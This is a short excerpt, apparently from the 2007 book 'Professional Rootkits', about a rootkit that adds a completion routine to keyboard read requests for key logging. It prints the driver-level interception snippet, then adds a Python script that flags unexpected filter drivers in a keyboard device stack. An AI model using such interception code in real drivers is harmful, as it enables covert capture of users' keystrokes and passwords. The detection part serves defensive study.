IoManager.c


Only nine lines of OnDispatch within IoManager.c were modified for key logging. OnDispatch is where all I/O request packets are routed. The added lines simply ensure that a completion routine is added to all keyboard read requests:

  // Intercept I/O Request Packets to the keyboard
  if( DeviceObject == newKeyboardDevice )
  {
          if( irpStack->MajorFunction == IRP_MJ_READ )
                  return OnKeyboardRead( DeviceObject, Irp, irpStack );
          IoSkipCurrentIrpStackLocation ( Irp );
          return IoCallDriver( oldKeyboardDevice, Irp );
  }
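
From the defender's side, a driver that receives keyboard IRPs on its own device and forwards them to the original one appears as an extra entry in the keyboard device stack, assuming newKeyboardDevice is attached above the original device as the forwarding to oldKeyboardDevice suggests. The following check is an added example, not code from the book: it compares a device-stack listing against a baseline, and the listing text (laid out like a WinDbg !devstack listing), the `ExampleFilter` driver name and the allowlist are constructed assumptions.

```python
import re

# Assumption: drivers expected in a keyboard device stack on the reviewed system.
# Replace with your own verified baseline.
EXPECTED_DRIVERS = {"kbdclass", "i8042prt", "kbdhid", "hidusb", "acpi"}

# Rows look like: "> 86f51030  \Driver\Kbdclass   86f510e8  KeyboardClass0"
ROW = re.compile(r"^\s*>?\s*([0-9a-fA-F`]+)\s+\\Driver\\(\S+)")

def parse_stack(listing):
    """Return [(device_object_address, driver_name), ...], top of stack first."""
    return [m.groups() for m in map(ROW.match, listing.splitlines()) if m]

def unexpected_filters(listing, expected=EXPECTED_DRIVERS):
    """Return (position, address, driver) for every driver outside the baseline."""
    return [(pos, addr, drv)
            for pos, (addr, drv) in enumerate(parse_stack(listing))
            if drv.lower() not in expected]

# Constructed sample: an unmodified PS/2 keyboard stack.
SAMPLE_CLEAN = r"""
  !DevObj   !DrvObj            !DevExt   ObjectName
> 86f51030  \Driver\Kbdclass   86f510e8  KeyboardClass0
  86f7b020  \Driver\i8042prt   86f7b0d8
  86fc4f18  \Driver\ACPI       86fd6008  00000060
"""

# Constructed sample: the same stack with an unnamed filter device on top.
# "ExampleFilter" is a placeholder, not a name taken from the book.
SAMPLE_FILTERED = r"""
  !DevObj   !DrvObj               !DevExt   ObjectName
  87a02c10  \Driver\ExampleFilter 87a02cc8
> 86f51030  \Driver\Kbdclass      86f510e8  KeyboardClass0
  86f7b020  \Driver\i8042prt      86f7b0d8
  86fc4f18  \Driver\ACPI          86fd6008  00000060
"""

if __name__ == "__main__":
    for name, text in (("clean", SAMPLE_CLEAN), ("filtered", SAMPLE_FILTERED)):
        hits = unexpected_filters(text)
        print(name, "->", hits if hits else "no unexpected drivers")
```

An entry above Kbdclass is not proof of compromise, since legitimate keyboard filter drivers exist; it is the item to verify against the driver's signature and install history.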




Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
